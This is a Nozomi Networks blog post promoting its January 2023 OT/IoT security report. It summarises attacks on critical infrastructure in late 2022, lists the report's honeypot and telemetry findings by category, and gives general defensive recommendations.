Nozomi Networks Researchers Take a Deep Look into the ICS Threat Landscape

Share This

Monitoring the constantly-evolving cyber threat landscape is essential in staying up-to-date on the latest threats and potential attack vectors. This allows organizations to anticipate vulnerabilities, proactively harden their systems, and implement countermeasures that can protect against malicious actors. By understanding how their networks may be susceptible to attack, organizations can take action to reduce the likelihood of a successful breach.

In the past six months, Nozomi Networks researchers have seen an increase in the number and severity of cyberattacks, disrupting businesses and critical infrastructure around the globe. Railways have been particularly targeted by attackers, necessitating increased protective protocols for rail operators. Additionally, hacktivists have utilized wiper malware as a means to undermine vital services for political reasons. With malicious actors continuously evolving their tactics, organizations must stay informed about the latest threats facing OT/IoT systems and take necessary steps to safeguard their assets from any potential attack.

Here are some of the highlights in our semi-annual OT/IoT Security Report, published today: 

  • Cyberattacks on critical infrastructure 
  • Hacktivist TTPs 
  • Intrusion alerts affecting OT environments 
  • Malware categories affecting IT, OT, and IoT 
  • Top vulnerable industries 
  • Recommendations and 2023 forecast

The Cyber Threat Landscape 

In the second half of 2022, we’ve continued to see cyberattacks on critical infrastructure (namely rail), hacktivists causing disruptive attacks, thefts of technology source code, and use of wiper malware. Below is a timeline summarizing the most significant cyber events—cyberattacks, new policies, malware, etc.—from July to December 2022:   

OT & ICS Cybersecurity Threat Timeline 2H 2022
In the second half of 2022, we’ve continued to see cyberattacks on critical infrastructure, hacktivist attacks, and wiper malware.

In June and July 2022, the Mobarakeh Steel Company (MSC), Khouzestan Steel Company (KSC) and Hormozgan Steel Company (HOSCO) experienced a cyberattack that disrupted their websites and production lines. The attack was claimed by the hacktivist group Gonjeshke Darandehat, which had also employed wiper malware to disrupt the Iranian train system earlier in the year. This incident confirms that critical infrastructure is subject to malicious actors regardless of motive or affiliation.

Between the months of August and September, there were several disruptive attacks on manufacturing, oil, water, and electric utility companies. In October, a ransomware attack hit CommonSpirit Health, the fourth-largest U.S. health system with 140 affiliate hospitals. The attack led to delays in surgeries and other patient operations. There was also a series of cyberattacks across Europe. In December, a ransomware attack at French hospital Corbeil-Essonnes resulted in a data leak and disruption of operations

In November, Continental – an automotive and rail technology giant that develops cutting-edge technologies such as automated braking systems, vehicle monitoring systems, and navigations systems – was hit with a cyberattack. The attackers had already breached Continental’s networks before they struck, allowing them to gain access to numerous technical documents and source code pertaining to Continental’s advanced technologies. Attackers accessing source code for these technologies is cause for major concern.

Exclusive Nozomi Networks Insights 

In the report, we share exclusive statistics sourced from the fully anonymized detection telemetry of participating customer environments. We provide insights into the most critical intrusion alerts affecting IT, IoT, and OT environments.

We also share unique data collected by Nozomi Networks Labs honeypots, including:

  • Protocols involving hard coded credentials
  • Attack source locations
  • Top credentials used
  • Top number of unique attacker IPs
  • Top attacker IP addresses
  • Top executed commands

This data can help security teams get a better understanding of the threats they face and validate their existing defense strategy and approach.

Download our full report for detailed trend and pattern graphs, as well as additional insights into the vulnerability landscape and industries most affected by published vulnerabilities.

Recommendations & Forecast 

Organizations can take several steps to minimize cyberattacks on critical infrastructure such as: monitoring for new threats and attack vectors, performing regular security audits, encrypting stored data, ensuring that all software and hardware are up to date with the latest patches, and educating personnel about best practices for limiting exposure. Read our blog for our 2023 predictions. 


OT/IoT Security Report – January 2023 

Nozomi Networks Labs evaluates the current threat landscape to report on notable cyberattacks on critical infrastructure, threat actor intrusion tactics, insights from our IoT honeypots gathered from malicious botnets, and analysis of ICS-CERT advisories to determine which industries are most vulnerable. 


A Deep Look Into the ICS Threat Landscape

January 25, 2023 | 7:30 AM PST, 10:30 AM EST, 4:30 PM CET  

Watch the Nozomi Networks Labs webinar for key insights not covered in the report.

Let's get started

Discover how easy it is to identify and respond to cyber threats by automating your IoT and OT asset discovery, inventory, and management.

Vantage IQ

The next generation of AI-powered analysis and response for critical infrastructure and industrial operations.   Register for Preview Event